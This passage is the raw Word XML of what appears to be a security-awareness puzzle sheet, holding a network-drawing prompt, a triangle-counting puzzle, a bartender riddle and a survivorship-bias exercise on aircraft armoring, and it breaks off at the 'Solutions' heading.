        <w:t xml:space="preserve">Draw a line from the laptop to the data </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>center</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A24BF9" w14:textId="3AE7C766" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:noProof/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="449D0B38" wp14:editId="08EA4197">
            <wp:extent cx="5731510" cy="51352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5731510" cy="5135245"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07498360" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A41AD47" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="57C449B2">
          <v:rect id="_x0000_i1117" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hrnoshade="t" o:hr="t" fillcolor="#1c1e21" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A1477F" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>TRIANGLE PUZZLE</w:t>
      </w:r>
      <w:hyperlink r:id="rId140" w:anchor="triangle-puzzle" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00214945">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2A40B0A6" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC59E29" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Count the triangles. How many are shown?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5133CE" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Answer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3D466C" w14:textId="088DE458" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:noProof/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="204C1027" wp14:editId="35F16631">
            <wp:extent cx="5731510" cy="2508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5731510" cy="2508250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C355E1" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="21145D85">
          <v:rect id="_x0000_i1119" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hrnoshade="t" o:hr="t" fillcolor="#1c1e21" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C27EDD" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>WORD PUZZLE</w:t>
      </w:r>
      <w:hyperlink r:id="rId142" w:anchor="word-puzzle" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00214945">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7D89D44D" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA27D05" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Write your explanation to the following story.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A2E3CA" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">A man walks into a bar and asks the bartender for a glass of water. The bartender pulls out a gun and points it at the man. The man </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>says</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> “thank you" and walks out.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B096DFC" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CD3FD3" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="25547762">
          <v:rect id="_x0000_i1120" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hrnoshade="t" o:hr="t" fillcolor="#1c1e21" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5416756A" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>ALTERNATIVE THOUGHT PROCESSING</w:t>
      </w:r>
      <w:hyperlink r:id="rId143" w:anchor="alternative-thought-processing" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00214945">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7CA355B2" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211B86FA" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Contemplate the following and think of areas in which common misconceptions or bias influence how security is implemented or approached in your organization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3815DB4B" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Given the red dots are areas in which combat aircraft are often hit during engagement, what does the following diagram indicate? What would be your recommendations for additional </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>armoring</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the aircraft?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398AA81C" w14:textId="4B064670" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:noProof/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3474A9B1" wp14:editId="391DE5D1">
            <wp:extent cx="5731510" cy="42633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731510" cy="4263390"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1760082D" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="7A9EC2E4">
          <v:rect id="_x0000_i1122" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hrnoshade="t" o:hr="t" fillcolor="#1c1e21" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A265D32" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">!! Stop </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Here !!</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0CD21F82" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Warning: Do not continue until ready to see solutions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740F779E" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="37A78BA1">
          <v:rect id="_x0000_i1123" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hrnoshade="t" o:hr="t" fillcolor="#1c1e21" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="106CEDD9" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DED64A4" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00214945" w:rsidRDefault="00214945" w:rsidP="00214945">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SOLUTIONS (DON'T PEEK)</w:t>
      </w:r>
